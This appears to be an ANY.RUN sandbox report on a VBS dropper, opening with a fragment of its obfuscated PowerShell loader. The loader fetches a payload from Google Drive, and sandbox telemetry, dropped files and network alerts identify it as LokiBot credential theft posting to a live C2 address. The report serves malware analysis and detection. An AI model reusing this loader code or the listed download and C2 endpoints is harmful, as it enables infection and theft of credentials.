bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6916"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\Gymnasielrere84.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7036"C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\Windows Mail\wabmig.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) Contacts Import Tool
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Total events
10 420
Read events
10 420
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wp4xrrfo.yyk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1148powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7036wabmig.exeC:\Users\admin\AppData\Roaming\F3F363\3C28B3.hdbbinary
MD5:1013079A9BF8FFA458C230EA6AAF8A89
SHA256:1B1F3BCE8DF0FC7E33B518DAB09D09AF3680E39BCC3C760DADCC50C931007BE8
7036wabmig.exeC:\Users\admin\AppData\Roaming\F3F363\3C28B3.lckbinary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1148powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ap1cetff.mwm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1148powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5oqzhbzh.v3h.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i3ef5vur.32h.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7036wabmig.exeC:\Users\admin\AppData\Roaming\F3F363\3C28B3.exeexecutable
MD5:AD6081F6434A2E186E49F64C069CD8BF
SHA256:7E3B061A41AB3BF3F6F6A701148E50769E1208ABAB70235B85E1CF0E929729E1
7036wabmig.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\0f5007522459c86e95ffcc62f32308f1_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D898504A722BFF1524134C6AB6A5EAA5
SHA256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
6340powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:47004ADDD8953568AAE3C8C9335114B0
SHA256:050EE8B11CC688C5478A46A2CCC3ABE9023BC80E617EBCEDBCADCBB21DCA95A3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
26
DNS requests
7
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2864
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
303
142.250.185.196:443
https://drive.google.com/uc?export=download&id=1lI7SoYb_aBEmRmJJI-u31JgwtXJMn_Qm
unknown
2120
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
303
142.250.185.196:443
https://drive.google.com/uc?export=download&id=1EnM8GOCjgl_bDxtuyCHqVfNNgLyGaAWF
unknown
POST
500
137.184.191.215:80
http://137.184.191.215/index.php/wp.php?view=1
unknown
unknown
POST
500
137.184.191.215:80
http://137.184.191.215/index.php/wp.php?view=1
unknown
unknown
POST
500
137.184.191.215:80
http://137.184.191.215/index.php/wp.php?view=1
unknown
unknown
POST
500
137.184.191.215:80
http://137.184.191.215/index.php/wp.php?view=1
unknown
unknown
4076
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
142.250.186.65:443
https://drive.usercontent.google.com/download?id=1lI7SoYb_aBEmRmJJI-u31JgwtXJMn_Qm&export=download
unknown
text
471 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:137
whitelisted
4076
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2864
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4076
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2864
RUXIMICS.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2120
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
6340
powershell.exe
142.250.186.174:443
drive.google.com
GOOGLE
US
shared

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 142.250.74.206
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
drive.google.com
  • 142.250.186.174
  • 142.250.186.110
shared
drive.usercontent.google.com
  • 142.250.186.65
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET MALWARE LokiBot User-Agent (Charon/Inferno)
A Network Trojan was detected
ET MALWARE LokiBot User-Agent (Charon/Inferno)
Malware Command and Control Activity Detected
ET MALWARE LokiBot Checkin
Malware Command and Control Activity Detected
ET MALWARE LokiBot Checkin
A Network Trojan was detected
ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
A Network Trojan was detected
ET MALWARE LokiBot User-Agent (Charon/Inferno)
Malware Command and Control Activity Detected
ET MALWARE LokiBot Checkin
A Network Trojan was detected
ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
Malware Command and Control Activity Detected
ET MALWARE LokiBot Request for C2 Commands Detected M2
Malware Command and Control Activity Detected
ET MALWARE LokiBot Request for C2 Commands Detected M1
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Gymnasielrere84.vbs